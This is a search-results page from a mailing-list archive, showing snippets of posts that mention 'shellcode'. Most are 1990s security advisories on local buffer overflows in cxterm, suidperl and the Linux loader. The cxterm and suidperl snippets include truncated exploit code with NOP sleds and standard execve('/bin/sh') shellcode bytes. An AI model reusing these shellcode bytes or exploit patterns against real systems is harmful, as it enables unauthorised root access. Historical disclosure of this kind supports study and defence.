search for: shellcode

Displaying 15 results from an estimated 15 matches for "shellcode".

1997 Feb 14
0
Linux NLSPATH buffer overflow (fwd)
...I hope it wasn''t... I just occasionally found a vulnerability in Linux libc (actually, some of the versions seem not to be vulnerable; my Slackware 3.1 box was though). Unfortunately, I have no time for a real investigation right now, but here''s the exploit anyway. Note that the shellcode is a bit different from the usual one: -- it does setuid(geteuid()) by itself; -- easier to modify (no more fixed offsets in shellcode, and the shell name can be changed, too -- the length is not fixed); -- the NULL pointer itself is passed in %edx to the execve syscall, not the pointer to NULL (it...
1997 Sep 26
3
Forwarded mail....
...not good for explain go fuck !=)) --**JOKE**-- ------------------------------------------------------------------------------ patch ?? WHAT U WANNA A PATCH ??? :)))) ------------------------------------------------------------------------------ [SO..] we search the shellcode of other system (SUNos , solaris, etc) and specialy SCO ! ------------------------------------------------------------------------------ usage: first you must have a special smbclient for send a large large passwd how ?? tell me for the bin of get the source of samba and change in smb.h at line 24...
1997 May 14
4
cxterm buffer overrun
...mzhang@softcom.net */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #define CXTERM_PATH "/usr/X11R6/bin/cxterm" #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 #define NOP_SIZE 1 char nop[] = "\x90"; char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int arg...
1997 Nov 13
0
another buffer overrun in sperl5.003
...;AAAA" The variable called top_env has been overwritten. In fact, it is jmp_buf and Perl calls longjmp() with it somewhere in my_exit(). Run this and wait for a root prompt: [exploit code] #!/usr/bin/perl # yes, this suidperl exploit is in perl, isn''t it wonderful? :) $| = 1; $shellcode = "\x90" x 512 . # nops "\xbc\xf0\xff\xff\xbf" . # movl $0xbffffff0,%esp # "standard shellcode" by Aleph One "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" . "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\...
2015 Feb 04
5
Another Fedora decision
...ow already has root privileges. They don?t need to crack your > passwords now. You?re already boned. Not exactly. There have been remotely exploitable vulnerabilities where an arbitrary file could be read (not written), but otherwise root access wasn't given by the exploit; that is, no shellcode per se. If you can somehow (buffer overflow shellcode or something similar) get, say, httpd to return a copy of /etc/shadow in a GET request, well, you don't have root, but you do have the hashed passwords. It doesn't take an interactive root session, and may not even leave a trace of...
2004 Mar 12
1
bin/64150: [PATCH] ls(1) coredumps when started via execve(2) with no argv.
On Fri, Mar 12, 2004 at 11:57:30AM +0100, Morten Rodal wrote: > On Fri, Mar 12, 2004 at 12:49:14PM +0200, Ruslan Ermilov wrote: > > On Fri, Mar 12, 2004 at 10:22:00AM +0100, Morten Rodal wrote: > > > >Description: > > > ls(1) calls the fts(3) functions for traversing a file hierarchy. > > > If ls(1) is executed via execve(2) system call with a NULL argv >
2015 Feb 04
0
Another Fedora decision
...hey don?t need to crack your passwords now. >> You?re already boned. > > > Not exactly. > > There have been remotely exploitable vulnerabilities where an arbitrary file > could be read (not written), but otherwise root access wasn't given by the > exploit; that is, no shellcode per se. If you can somehow (buffer overflow > shellcode or something similar) get, say, httpd to return a copy of > /etc/shadow in a GET request, well, you don't have root, but you do have the > hashed passwords. It doesn't take an interactive root session, and may not > even l...
2003 Aug 28
0
[louisk@bend.com: snort, postgres, bridge]
...t 8081, set your # HTTP_PORTS variable like this: # # var HTTP_PORTS 8010 # # Port lists must either be continuous [eg 80:8080], or a single port [eg 80]. # We will adding support for a real list of ports in the future. # Ports you run web servers on var HTTP_PORTS 80 # Ports you want to look for SHELLCODE on. var SHELLCODE_PORTS !80 # Ports you do oracle attacks on var ORACLE_PORTS 1521 # other variables # # AIM servers. AOL has a habit of adding new AIM servers, so instead of # modifying the signatures when they do, we add them to this list of # servers. var AIM_SERVERS [64.12.24.0/24,64.12.25.0...
2010 Sep 16
3
funciones en R potencialmente peligrosas via web?
Hola: Para el desarrollo del nuevo PluginR de Tiki (para poder ejecutar scripts de R desde Tiki: en páginas Wiki, hojas de cálculo web, etc, http://dev.tiki.org/PluginR ), por ahora estamos usando la lista de funciones que se usaban en el proyecto r-php, y que fueran heredadas por la extensión R de MediaWiki. Como r-php se hizo hace algunos años (2006), me pregunto si alguien sabe si hay
1998 Feb 04
0
An old ld-linux.so hole
...executing. It devours all remaining file table entries and goes to sleep. Another context switch and /usr/bin/passwd (formerly known as spawn.c ) executes. Dynamic linker cannot open /lib/libc.so.5 ( error: file table full ), cooks an error message, an overflows occures. Great. However, a standard shellcode is of no use in this case: we can''t exec anything ( there is still no file table entries free ! ). Instead of giving up after first unsucesful exec, shellcode should first kill one of eat_desc processes, and then in a loop infinitely try to execute the program we wish to. This scenario i...
2008 Apr 24
4
Pure Ruby HTTP parser
Before anything else, let me state this: Of course it''s going to be PAINFULLY slow on MRI. That''s not the point :) I thought I''d try out writing out a Ruby version of the parser for the purposes of Rubinius. For those of you who aren''t aware, Ragel supports a goto-driven FSM on Rubinius by injecting assembly directly, and Rubinus head honcho guy Evan Phoenix
2012 Nov 28
3
CentOS version for sparc
Hello there, I'd like to have iso image version for ultra sparc 64bit. Recently, I downloaded centos version 4.2 beta iso image and installed on SunUltra sparc 64 bit machine. It was hang when it went to the screen " the CentOS 4.2 beta screen, <Tab>/<Alt tab> | <Space> selects | <F12> next screen ". Any idea? Please help. Thanks in advance. Amy on your
2011 Feb 18
5
BInd Problem or Update SSL ?
> From: Larry Vaden <vaden at texoma.net> > Date: Sun, Jan 23, 2011 at 8:03 PM > Subject: sources of bind-9.7.2-P3 rpms for Centos 4.8 and 5.5? > Our site running Centos 4.8 and 5.5 name servers was hacked with > the result that www.yahoo.com is now within our /19 and causing > some grief. Don't understand what you mean by 'within our /19'. Have your IP
1998 Aug 25
1
Named Overflow Concern - SUMMARY (fwd)
George Brown sent this to my private Email address instead of to the list. Because I forwarded it, my addres is in the header. Roger. ----- Forwarded message from root ----- >From root@bull.bullnet.co.uk Mon Aug 24 16:20:29 1998 Received: from dutepp0.et.tudelft.nl by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff) for <wolff@localhost> (single-drop); Mon Aug 24
1999 Nov 12
1
[RHSA-1999:054-01] Security problems in bind (fwd)
Woops... this didn't show up here but it did on BugTraq. Questions answered! -- Chuck Mead, CTO, MoonGroup Consulting, Inc. <http://moongroup.com> Mail problems? Send "s-u-b-s-c-r-i-b-e mailhelp" (no quotes and no hyphens) in the body of a message to mailhelp-request@moongroup.com. Public key available at: wwwkeys.us.pgp.net ----------